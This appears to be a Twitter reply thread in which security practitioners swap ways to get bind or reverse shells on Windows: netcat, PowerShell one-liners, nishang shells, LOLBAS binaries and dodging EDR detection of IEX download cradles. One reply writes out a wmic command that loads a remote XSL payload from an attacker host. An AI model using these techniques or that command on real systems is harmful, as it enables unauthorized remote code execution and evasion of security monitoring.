I mean uploading a static nc executable and running a cmd bind shell works a charm :)
-
I agree :) Though for the sake of discussion let's assume I'm looking for something Windows specific (like, assume the machine has no internet access, only LAN, and you have a machine on LAN).
-
this downloader counts? https://twitter.com/cyb3rops/status/1187037377560272897?s=19 …
-
I tried writing some PowerShell """one liner""" in the past just for fun™, and as it turns out running a revere shell on Windows is pretty awful... shortest I could get was in the order of the hundreds of characters (~500). It's a real pain.
-
whoops, *reverse. Also, it really depends whether you really want a shell or just want to exfiltrate data, if you want a full cmd prompt or just want to see the results back while sending commands in some not-so-aesthetically-pleasing way or not (which makes it simpler), etc...
-
Afaik, there's no direct equivalent. Many EDRs can detect the IEX(<download>) stuff now, so my personal approach is just coding my own variant based on stuff here: https://github.com/samratashok/nishang/tree/master/Shells …
-
Of particular interest to you is probably the Invoke-PowerShellTcpOneLine.ps1 which has a decently small fingerprint.
-
You might be able to cobble something up with these: https://lolbas-project.github.io
-
Used to be able to do wmic os get /format:http://10.0.0.1/hack.xsl; otherwise powershell iex seems most sensible
-
Has anyone already done this for x64 executables?
That DLL import from a network share looks as if ...